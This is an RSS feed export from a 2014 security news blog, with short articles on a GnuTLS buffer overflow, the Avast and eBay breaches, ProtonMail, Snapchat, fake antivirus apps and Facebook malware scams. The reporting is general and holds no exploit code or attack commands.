<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Tech</title>
	<atom:link href="http://hackingtech.in/feed/" rel="self" type="application/rss+xml" />
	<link>http://hackingtech.in</link>
	<description></description>
	<lastBuildDate>Sat, 21 Mar 2015 13:37:55 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>https://wordpress.org/?v=4.5.3</generator>
	<item>
		<title>Bug in GnuTLS allows hackers to run malicious code in Your Linux</title>
		<link>http://hackingtech.in/bug-in-gnutls-allows-hackers-to-run-malicious-code-in-your-linux/</link>
		<comments>http://hackingtech.in/bug-in-gnutls-allows-hackers-to-run-malicious-code-in-your-linux/#respond</comments>
		<pubDate>Wed, 04 Jun 2014 08:57:58 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Website Vulnerabilities & Security]]></category>
		<category><![CDATA[DTLS]]></category>
		<category><![CDATA[GNUTLS]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[TLS]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1960</guid>
		<description><![CDATA[Another major security vulnerability has been discovered in the popular cryptographic Library &#8216;GnuTLS&#8217; that leaves Linux vulnerable to remote code execution. GNUTLS is a free library implementing Secure Socket Layer(SSL), Transport Layer Security (TLS) and Datagram Transport Layer Security(DTLS) protocols which are used to offer secure communications. &#8220;A flaw was found in the way GnuTLS &#8230; <a href="http://hackingtech.in/bug-in-gnutls-allows-hackers-to-run-malicious-code-in-your-linux/" class="more-link">Continue reading <span class="screen-reader-text">Bug in GnuTLS allows hackers to run malicious code in Your Linux</span></a>]]></description>
				<content:encoded><![CDATA[<p>Another major security vulnerability has been discovered in the popular cryptographic Library &#8216;GnuTLS&#8217; that leaves Linux vulnerable to remote code execution.</p>
<p>GNUTLS is a free library implementing Secure Socket Layer(SSL), Transport Layer Security (TLS) and Datagram Transport Layer Security(DTLS) protocols which are used to offer secure communications.</p>
<p>&#8220;A flaw was found in the way GnuTLS parsed session ids from Server Hello packets of the TLS/SSL handshake.&#8221; an entry posted on the Red Hat Bug Tracker reads.</p>
<p><strong>Flaw</strong>: The read_server_hello function checks only whether the length of the Session ID does not exceed incoming packet size but it fails to ensure it doesn&#8217;t exceed maximum length of Session ID.<img class="aligncenter size-full wp-image-1961" src="http://hackingtech.in/wp-content/uploads/2014/06/gnutls-buffer-overflow-vulnerability-linux.jpg" alt="gnutls-buffer-overflow-vulnerability-linux" width="765" height="189" srcset="http://hackingtech.in/wp-content/uploads/2014/06/gnutls-buffer-overflow-vulnerability-linux.jpg 765w, http://hackingtech.in/wp-content/uploads/2014/06/gnutls-buffer-overflow-vulnerability-linux-300x74.jpg 300w" sizes="(max-width: 765px) 100vw, 765px" /></p>
<p>A malicious server could exploit this vulnerability by sending a very long Session ID value and run a malicious code in &#8220;a connecting TLS/SSL client using GnuTLS&#8221;.</p>
<p>In March, a different vulnerability was patched in GnuTLS Library that could have allowed attackers &#8220;to create a specially crafted certificate that could be accepted by GnuTLS as valid for a site chosen by the attacker&#8221;</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/bug-in-gnutls-allows-hackers-to-run-malicious-code-in-your-linux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Avast community forum hacked, user names and passwords stolen</title>
		<link>http://hackingtech.in/avast-community-forum-hacked-user-names-and-passwords-stolen/</link>
		<comments>http://hackingtech.in/avast-community-forum-hacked-user-names-and-passwords-stolen/#respond</comments>
		<pubDate>Tue, 27 May 2014 16:07:59 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Hack News]]></category>
		<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Avast]]></category>
		<category><![CDATA[SMF]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1955</guid>
		<description><![CDATA[Antivirus firm Avast said it took its community forum offline following a hacking attack compromised its database. User names, email addresses,nick names and passwords were compromised in this attack.  The breach did not involve any financial data, license or any other data. While the passwords are hashed(one way encryption), it will not take much time &#8230; <a href="http://hackingtech.in/avast-community-forum-hacked-user-names-and-passwords-stolen/" class="more-link">Continue reading <span class="screen-reader-text">Avast community forum hacked, user names and passwords stolen</span></a>]]></description>
				<content:encoded><![CDATA[<p>Antivirus firm Avast said it took its community forum offline following a hacking attack compromised its database.</p>
<p>User names, email addresses,nick names and passwords were compromised in this attack.  The breach did not involve any financial data, license or any other data.</p>
<p>While the passwords are hashed(one way encryption), it will not take much time for a hacker to crack the hashes. The longer the password, the harder it is to crack.</p>
<p>According to Avast blog post, the security breach affects less than 0.2% (about 400,000) of Avast&#8217;s 200 million users.</p>
<p>People who uses the same password on other websites are advised to change those passwords immediately.</p>
<p>Until now, their forum used an open source community software called &#8220;Simple Machines Forum(SMF)&#8221;.  It appears the Avast is using an outdated version of SMF.</p>
<p><img class="aligncenter size-full wp-image-1956" src="http://hackingtech.in/wp-content/uploads/2014/05/avast-forum-hacked-outdated-smf.jpg" alt="avast-forum-hacked-outdated-smf" width="600" height="323" srcset="http://hackingtech.in/wp-content/uploads/2014/05/avast-forum-hacked-outdated-smf.jpg 600w, http://hackingtech.in/wp-content/uploads/2014/05/avast-forum-hacked-outdated-smf-300x161.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /></p>
<p>Avast said it is now &#8220;We are now rebuilding the forum and moving it to a different software platform&#8221; which will be secure one.SMF</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/avast-community-forum-hacked-user-names-and-passwords-stolen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>eBay and Paypal Hacked; 128 Million Users Asked to Change Passwords</title>
		<link>http://hackingtech.in/ebay-and-paypal-hacked-128-million-users-asked-to-change-passwords/</link>
		<comments>http://hackingtech.in/ebay-and-paypal-hacked-128-million-users-asked-to-change-passwords/#respond</comments>
		<pubDate>Thu, 22 May 2014 09:36:39 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Hack News]]></category>
		<category><![CDATA[ebay]]></category>
		<category><![CDATA[PayPal]]></category>
		<category><![CDATA[SEA]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1950</guid>
		<description><![CDATA[eBay Inc.  has confirmed yesterday on its blog that it experienced one of the biggest criminal cyberattacks ever and has requested its users to change their passwords. “Changing passwords is a best practice and will help enhance security for eBay users,” said the blog. The hackers compromised a small number of employee log-in credentials and gained unauthorized access &#8230; <a href="http://hackingtech.in/ebay-and-paypal-hacked-128-million-users-asked-to-change-passwords/" class="more-link">Continue reading <span class="screen-reader-text">eBay and Paypal Hacked; 128 Million Users Asked to Change Passwords</span></a>]]></description>
				<content:encoded><![CDATA[<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">eBay Inc.  has confirmed yesterday on its blog that it experienced one of the </span>biggest criminal cyberattacks<span style="font-weight: inherit; font-style: inherit; color: #000000;"> ever and has requested its users to change their passwords.</span></p>
<blockquote style="color: #404040;">
<p style="font-weight: inherit; font-style: inherit;"><span style="font-weight: inherit; font-style: inherit; color: #000000;"><strong style="font-style: inherit;">“Changing passwords is a best practice and will help enhance security for eBay users,”</strong> said the blog.</span></p>
</blockquote>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">The hackers compromised a small number of employee log-in credentials and gained unauthorized access to eBay’s corporate network.</span></p>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">Apparently, the database ‘that contained encrypted passwords and other non-financial data’ was compromised between late February and early March, however, eBay discovered it only two weeks ago.</span></p>
<p style="color: #404040;"><img class="aligncenter size-full wp-image-1951" src="http://hackingtech.in/wp-content/uploads/2014/05/eBay-and-Paypal-Hacked-128-Million-Users-Asked-to-Change-Passwords-e1400748598874.jpg" alt="eBay-and-Paypal-Hacked-128-Million-Users-Asked-to-Change-Passwords-e1400748598874" width="450" height="274" srcset="http://hackingtech.in/wp-content/uploads/2014/05/eBay-and-Paypal-Hacked-128-Million-Users-Asked-to-Change-Passwords-e1400748598874.jpg 450w, http://hackingtech.in/wp-content/uploads/2014/05/eBay-and-Paypal-Hacked-128-Million-Users-Asked-to-Change-Passwords-e1400748598874-300x182.jpg 300w" sizes="(max-width: 450px) 100vw, 450px" /></p>
<p style="color: #404040;">
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">The data breached included sensitive personal information about customers’ name, encrypted password, email address, physical address, phone number and date of birth.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">But, the financial information and other confidential personal information about users were safe, the blog added.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">After extensive forensics, the company identified the compromised database and added that:</span></p>
<blockquote>
<p style="font-weight: inherit; font-style: inherit;"><span style="font-weight: inherit; font-style: inherit;"><strong style="font-style: inherit;"> <span style="color: #000000;">“there was</span></strong><span style="color: #000000;"> </span></span><span style="color: #000000;"><strong style="font-style: inherit;">no evidence of the compromise resulting in unauthorized activity for eBay users, and no evidence of any unauthorized access to financial or credit card information.”</strong></span></p>
</blockquote>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">eBay tried to assuage fears of PayPal [its online payment system] users that there was no evidence of compromise to their personal or financial information. Moreover, their data are stored on a separate network.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">The organization apologized for the inconvenience to its users and reassured their commitment towards information security and customer data protection.</span></p>
<blockquote>
<p style="font-weight: inherit; font-style: inherit;"><strong style="font-style: inherit;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">“We know our customers trust us with their information, and we take seriously our commitment to maintaining a safe, secure and trusted global marketplace.”</span></strong></p>
</blockquote>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">eBay is planning to send out emails, use site communications as well inform its users through appropriate marketing channels to change their passwords and also change passwords for other sites where the same password was used.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">eBay, which generated USD 205 billion of commerce in 2013, had its shares nosedive initially following the breach news; the shares rebounded by afternoon.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">This is not the first cyberattack against eBay. Recently, in February 2014, The Syrian Electronic Army (SEA), a notorious hacking group, had </span><span style="color: #000000;">hacked eBay and PayPal</span><strong style="font-style: inherit;"><span style="font-weight: inherit; font-style: inherit; color: #000000;"> “For denying Syrian citizens the ability to purchase online products.”</span></strong></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">In the attack, the SEA had modified the DNS records of ebay.co.uk and paypal.co.uk as well as hacked into their Domain Registry managed by Mark Monitor.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">The eBay attack could be the largest online breach following last year’s</span><span style="font-weight: inherit; font-style: inherit;"> </span><span style="color: #000000;">Target data breach<span style="font-weight: inherit; font-style: inherit;">,</span></span><span style="font-weight: inherit; font-style: inherit; color: #000000;"> which had impacted about 110 million customers.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/ebay-and-paypal-hacked-128-million-users-asked-to-change-passwords/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>‘NSA-Proof’ Email Service ‘ProtonMail’ by Harvard and MIT Students becomes massive success</title>
		<link>http://hackingtech.in/nsa-proof-email-service-protonmail-by-harvard-and-mit-students-becomes-massive-success/</link>
		<comments>http://hackingtech.in/nsa-proof-email-service-protonmail-by-harvard-and-mit-students-becomes-massive-success/#respond</comments>
		<pubDate>Tue, 20 May 2014 07:03:45 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Email Hacking and Security]]></category>
		<category><![CDATA[anti-NSA]]></category>
		<category><![CDATA[emails]]></category>
		<category><![CDATA[NSA]]></category>
		<category><![CDATA[Prism]]></category>
		<category><![CDATA[Protonmail]]></category>
		<category><![CDATA[Spying]]></category>
		<category><![CDATA[Surveillance]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1946</guid>
		<description><![CDATA[Necessity is the mother of invention, the old adage has proved its worth again when a group of Harvard and MIT students came together to create an NSA-proof email service. ProtonMail, the new email platform launched at European Organization for Nuclear Research (CERN) by five security experts ‘who were drawn together by a shared vision of a &#8230; <a href="http://hackingtech.in/nsa-proof-email-service-protonmail-by-harvard-and-mit-students-becomes-massive-success/" class="more-link">Continue reading <span class="screen-reader-text">‘NSA-Proof’ Email Service ‘ProtonMail’ by Harvard and MIT Students becomes massive success</span></a>]]></description>
				<content:encoded><![CDATA[<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">Necessity is the mother of invention, the old adage has proved its worth again when a group of Harvard and MIT students came together to create an </span>NSA<span style="font-weight: inherit; font-style: inherit; color: #000000;">-proof email service.</span></p>
<p style="color: #404040;">ProtonMail<span style="font-weight: inherit; font-style: inherit; color: #000000;">, the new email platform launched at European Organization for Nuclear Research (CERN) by five security experts ‘<em style="font-weight: inherit;">who were drawn together by a shared vision of a more secure and private Internet</em>,’ is probably safer and secure than Lavabit, Snowden’s defunct email service.</span></p>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">The service has many benefits over conventional email service providers. As the founders explain:</span></p>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">They are incorporated in Switzerland, which is well known for offering the strongest </span>privacy<span style="font-weight: inherit; font-style: inherit; color: #000000;"> protection to both individuals as well as countries.</span></p>
<p style="color: #404040;"><img class="aligncenter size-full wp-image-1947" src="http://hackingtech.in/wp-content/uploads/2014/05/nsa-proof-email-service-protonmail-launched-by-harvard-and-mit-students-becomes-massive-success.jpg" alt="nsa-proof-email-service-protonmail-launched-by-harvard-and-mit-students-becomes-massive-success" width="635" height="461" srcset="http://hackingtech.in/wp-content/uploads/2014/05/nsa-proof-email-service-protonmail-launched-by-harvard-and-mit-students-becomes-massive-success.jpg 635w, http://hackingtech.in/wp-content/uploads/2014/05/nsa-proof-email-service-protonmail-launched-by-harvard-and-mit-students-becomes-massive-success-300x217.jpg 300w" sizes="(max-width: 635px) 100vw, 635px" /></p>
<p style="color: #404040;">
<p style="color: #404040;"><span style="color: #000000;">The site uses end-to-end encryption and intense user authentication measures, implying that the data transmitted through their services is inaccessible to the ProtonMail team itself, let alone other people.</span></p>
<p style="color: #404040;"><span style="color: #000000;">“ProtonMail’s segregated authentication and decryption system means logging into a ProtonMail account that requires two passwords. The first password is used to authenticate the user and retrieve the correct account. The second password is a decryption password which is never sent to us. It is used to decrypt the user’s data in the browser so we never have access to the decrypted data, or the decryption password,” </span>reads the website<span style="font-weight: inherit; font-style: inherit; color: #000000;">.</span></p>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">It is free forever and does not allow tracking or logging of personally identifiable information.</span></p>
<p style="color: #404040;"><span style="font-weight: inherit; font-style: inherit; color: #000000;">“We do not save any metadata such as the IPs used to co</span>nnect to accounts, or  the times certain accounts are accessed,&#8221; the website says.</p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">Even data with non-ProtonMail users is secure and emails are provided with an optional expiration time so that there are no trails of sent messages.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">They use only trusted secure implementations AES, RSA, along with OpenPGP with open source cryptographic libraries.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">Besides, the service providers have invested heavily in hardware security, with fully encrypted hard disks and multiple password layers, thus preserving data security even in an event of hardware seize.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">Additionally, they conduct routine server side integrity checks and uses Swiss SSL secured connections.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">With a few weeks in private beta, ProtonMail launched its beta phase recently and is an easy to use ‘comprehensive security for everyone,’ according to the website claims.</span></p>
<p><span style="font-weight: inherit; font-style: inherit; color: #000000;">Worth giving a try!!!!</span></p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/nsa-proof-email-service-protonmail-by-harvard-and-mit-students-becomes-massive-success/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Can Snapchat stand up to Facebook’s upcoming SlingShot?</title>
		<link>http://hackingtech.in/can-snapchat-stand-up-to-facebooks-upcoming-slingshot/</link>
		<comments>http://hackingtech.in/can-snapchat-stand-up-to-facebooks-upcoming-slingshot/#respond</comments>
		<pubDate>Mon, 19 May 2014 11:12:26 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Mobile Apps]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[slingshot]]></category>
		<category><![CDATA[snapchat]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1941</guid>
		<description><![CDATA[&#160; Snapchat is the app to be this year. Everyone is trying ways to one-up the messaging app (including Yahoo) that started the self-destructing communication craze. It got a hold on teens, who have shunned Facebook to pick up their smartphones for a more private sharing experience. &#160; Facebook knew Snapchat had an edge and wanted to pick &#8230; <a href="http://hackingtech.in/can-snapchat-stand-up-to-facebooks-upcoming-slingshot/" class="more-link">Continue reading <span class="screen-reader-text">Can Snapchat stand up to Facebook’s upcoming SlingShot?</span></a>]]></description>
				<content:encoded><![CDATA[<p><img class="aligncenter size-full wp-image-1942" src="http://hackingtech.in/wp-content/uploads/2014/05/fbsc-624x351.jpg" alt="fbsc-624x351" width="639" height="359" srcset="http://hackingtech.in/wp-content/uploads/2014/05/fbsc-624x351.jpg 639w, http://hackingtech.in/wp-content/uploads/2014/05/fbsc-624x351-300x168.jpg 300w" sizes="(max-width: 639px) 100vw, 639px" /></p>
<p>&nbsp;</p>
<p>Snapchat is the app to be this year. Everyone is trying ways to one-up the messaging app (including Yahoo) that started the self-destructing communication craze. It got a hold on teens, who have shunned Facebook to pick up their smartphones for a more private sharing experience.</p>
<p>&nbsp;</p>
<p>Facebook knew Snapchat had an edge and wanted to pick up the startup last year for a reported $3 billion. But that number didn’t sway Snapchat and it continued adding features to the app that made people want it more. Last month, it updated the app (with wild success) to include video chatting and text-based messaging as well, thereby fully deploying its messaging arsenal without losing its core feature – all communication from Snapchat still gets deleted after a short period.</p>
<p>&nbsp;</p>
<p>Facebook is<strong> </strong>now working on its own private sharing app called<strong> SlingShot</strong>, which would primarily be a video-based service. But can it dethrone Snapchat, which already has a big user base, longer market exposure and has more features?</p>
<p>&nbsp;</p>
<p>The one area where Facebook can truly capitalise is by going after Snapchat’s weaknesses. One of them is that the app has just had to pay a large settlement in a lawsuit which alleged messages don’t get destroyed permanently or immediately. Snapchat agreed to the charges to settle with the FTC, so there’s definitely a little bit of stink attached to the app at the moment. Over time, this will evaporate away, so Facebook has a moment’s window to make their play, by releasing a completely secure, self-destructing chat service.</p>
<p>&nbsp;</p>
<p>Facebook’s supposed SlingShot app will definitely upset Snapchat’s growth trajectory, but to what extent is currently unknown. Facebook could do most damage is by bundling it into Messenger, rather than releasing it as a standalone app. Messenger remains relevant even as teens leave Facebook, as it’s a way to chat with your FB friends. An added privacy feature would go a long way towards ensuring more engaged users. That seems unlikely given Mark Zuckerberg’s commitment to standalone apps.</p>
<p>&nbsp;</p>
<p>Private messaging is a big chunk of all smartphone usage. One thing is certain: Facebook will have a huge user base to tap into with SlingShot and the numbers dwarf Snapchat’s active user base. So if SlingShot is any good at all, Facebook has a big pool to tap into. After the high of last year, it may be worrying days for Snapchat.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/can-snapchat-stand-up-to-facebooks-upcoming-slingshot/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fake Kaspersky Antivirus app found on Google Play, Windows Phone Store</title>
		<link>http://hackingtech.in/fake-kaspersky-antivirus-app-found-on-google-play-windows-phone-store-see-more-at-httpwww-ehackingnews-com201405fake-kaspersky-antivirus-app-found-on-htmlsthash-xb5lbyza-dpuf/</link>
		<comments>http://hackingtech.in/fake-kaspersky-antivirus-app-found-on-google-play-windows-phone-store-see-more-at-httpwww-ehackingnews-com201405fake-kaspersky-antivirus-app-found-on-htmlsthash-xb5lbyza-dpuf/#respond</comments>
		<pubDate>Sun, 18 May 2014 07:43:29 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[Mobile Apps]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[google play store]]></category>
		<category><![CDATA[kaspersky antivirus]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[mozilla mobile]]></category>
		<category><![CDATA[truecaller]]></category>
		<category><![CDATA[Windows Phone]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1934</guid>
		<description><![CDATA[&#160; While Google Play Store is able to prevent malicious applications from being uploaded to the market, Google still fails to prevent cyber criminals from uploading fake apps. Last Month, Android Police discovered a fake Antivirus app on Google Play going by the name of &#8216;Virus Shield&#8217; which fooled thousands of users into buying this &#8230; <a href="http://hackingtech.in/fake-kaspersky-antivirus-app-found-on-google-play-windows-phone-store-see-more-at-httpwww-ehackingnews-com201405fake-kaspersky-antivirus-app-found-on-htmlsthash-xb5lbyza-dpuf/" class="more-link">Continue reading <span class="screen-reader-text">Fake Kaspersky Antivirus app found on Google Play, Windows Phone Store</span></a>]]></description>
				<content:encoded><![CDATA[<p><img class="aligncenter  wp-image-1935" src="http://hackingtech.in/wp-content/uploads/2014/05/fake-kaspersky-antivirus.jpg" alt="fake-kaspersky-antivirus" width="564" height="305" /></p>
<p>&nbsp;</p>
<p>While Google Play Store is able to prevent malicious applications from being uploaded to the market, Google still fails to prevent cyber criminals from uploading fake apps.</p>
<p>Last Month, Android Police discovered a fake Antivirus app on Google Play going by the name of &#8216;Virus Shield&#8217; which fooled thousands of users into buying this app.</p>
<p>The story of fake Antivirus apps doesn&#8217;t stop there. Today, Experts at Kaspersky have discovered one more fake Antivirus app going by the name of &#8216;Kaspersky Anti-virus 2014&#8217; on Google Play.</p>
<p>The fake version of Kaspersky was being sold for $4 that does nothing other than displaying the Kaspersky Logo.</p>
<p>Researchers also discovered that few fake apps were being sold at Windows Phone Store. Some of them are &#8216;Mozilla Mobile&#8217;, &#8216;Kaspersky Mobile&#8217;, &#8216;Avira Antivirus&#8217; and the &#8216;Virus Shield&#8217; apps.</p>
<p>The fake version of Kaspersky antivirus app for Windows phone pretends to be scanning your device but does nothing.</p>
<p><img class="aligncenter  wp-image-1936" src="http://hackingtech.in/wp-content/uploads/2014/05/kaspersky-fake-antivirus-windows-phone.jpg" alt="kaspersky-fake-antivirus-windows-phone" width="200" height="319" /></p>
<p>&nbsp;</p>
<p>Few weeks back, when i was searching for TrueCaller app for my Windows phone, i also came across a fake paid Version of TrueCaller and other apps. After i reported to Microsoft, they removed those apps from the store.</p>
<p>Just now, I also found a fake version of COMODO Antivirus for the windows phone which is being sold for $1.49. This fake app was uploaded by cheedella suresh( The name appears to be South Indian name).</p>
<p><img class="aligncenter size-large wp-image-1937" src="http://hackingtech.in/wp-content/uploads/2014/05/comodo-fake-antivirus-windows-phone-store-1024x601.jpg" alt="comodo-fake-antivirus-windows-phone-store" width="702" height="412" srcset="http://hackingtech.in/wp-content/uploads/2014/05/comodo-fake-antivirus-windows-phone-store-1024x601.jpg 1024w, http://hackingtech.in/wp-content/uploads/2014/05/comodo-fake-antivirus-windows-phone-store-300x176.jpg 300w, http://hackingtech.in/wp-content/uploads/2014/05/comodo-fake-antivirus-windows-phone-store.jpg 1157w" sizes="(max-width: 702px) 100vw, 702px" /></p>
<p>As you can see, the developer has also uploaded few other fake apps in Windows phone store.  These apps have been uploaded in the recent months(April- May).</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingtech.in/fake-kaspersky-antivirus-app-found-on-google-play-windows-phone-store-see-more-at-httpwww-ehackingnews-com201405fake-kaspersky-antivirus-app-found-on-htmlsthash-xb5lbyza-dpuf/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Real Ghost Caught on Camera! New Facebook Scams Lure Users to Download Malware</title>
		<link>http://hackingtech.in/real-ghost-caught-on-camera-new-facebook-scams-lure-users-to-download-malware/</link>
		<comments>http://hackingtech.in/real-ghost-caught-on-camera-new-facebook-scams-lure-users-to-download-malware/#respond</comments>
		<pubDate>Fri, 16 May 2014 10:54:18 +0000</pubDate>
		<dc:creator><![CDATA[Chirag Desai]]></dc:creator>
				<category><![CDATA[All About Exploits]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[hacking news]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[phishing scam]]></category>
		<category><![CDATA[scam]]></category>

		<guid isPermaLink="false">http://hackingtech.in/?p=1930</guid>
		<description><![CDATA[&#160; If your Facebook wall offers you any horror videos that claim to be of a real ghost spotted, don’t dare to click on them, as it may be hoaxes, malwares or scams contained within which are the real horror for the online users. We have seen a lot of Facebook scams spreading through the &#8230; <a href="http://hackingtech.in/real-ghost-caught-on-camera-new-facebook-scams-lure-users-to-download-malware/" class="more-link">Continue reading <span class="screen-reader-text">Real Ghost Caught on Camera! New Facebook Scams Lure Users to Download Malware</span></a>]]></description>
				<content:encoded><![CDATA[<p><img class="aligncenter size-full wp-image-1931" src="http://hackingtech.in/wp-content/uploads/2014/05/Real-ghost.jpg" alt="Real-ghost" width="728" height="450" srcset="http://hackingtech.in/wp-content/uploads/2014/05/Real-ghost.jpg 728w, http://hackingtech.in/wp-content/uploads/2014/05/Real-ghost-300x185.jpg 300w" sizes="(max-width: 728px) 100vw, 728px" /></p>
<p>&nbsp;<br />
If your Facebook wall offers you any horror videos that claim to be of a real ghost spotted, don’t dare to click on them, as it may be hoaxes, malwares or scams contained within which are the real horror for the online users.</p>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">We have seen a lot of Facebook scams spreading through the Facebook timeline in wild that encourages users to click on it and fall victim, and this time some new horror scam campaign is going viral on Facebook.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Christopher Boyd from the security firm Malwarebytes has discovered an epidemic of hoaxes making their way around Facebook with paranormal themes, including:</div>
<div style="text-align: justify;"></div>
<ul>
<li>Alleged footage of an “actual” ghost attack</li>
<li>a video featuring the Aswang that is described as “a mythical shape-shifting were-dog/vampire/terrifying thing from the Philippines”</li>
<li>a video of Mermaids claiming they are back!</li>
<li>Video of a huge great white shark tearing apart a sea captain.</li>
</ul>
<div style="text-align: justify;">Facebook has become one of the most popular social networking website with more than one billion active users this year and daily hundreds of people join the networking website to connect with new friends and reconnect with their old friends.</div>
<div style="text-align: justify;"><!-- adsense --></div>
<div style="text-align: justify;">But, with the increase in various scams on Facebook to target users, it became very clear that not only does the social networking platform provide special opportunities for people to connect and share information; it also serves as a great and useful platform for scammers to spread malware or virus infections or redirect users to the sites of their own choice.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Once again scammers have targeted Facebook users and encouraging them to open the scammed video and once clicked, Facebook users are either asked to download or install updates to the video players, but actually these installations will lead to successful malware installation to the users system.</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;"><a style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" href="http://4.bp.blogspot.com/-Jwq-_5VNSOo/U24a4-BtGMI/AAAAAAAAbkg/xCn849m5oNM/s1600/shark-video.jpg"><img src="http://4.bp.blogspot.com/-Jwq-_5VNSOo/U24a4-BtGMI/AAAAAAAAbkg/xCn849m5oNM/s728/shark-video.jpg" alt="" border="0" /></a></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">According to Malwarebytes, the ghost attack scam video will led users to the install PUP.Optional.InstallBrain.A, the Aswang prompted unsuspecting Facebook users to download “<i>scan your PC</i>” malware, the mermaids led to an iLivid install that was actually PUP.Optional.Bandoo, whereas the shark brought users to pages filled with spammy surveys and downloads.</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">
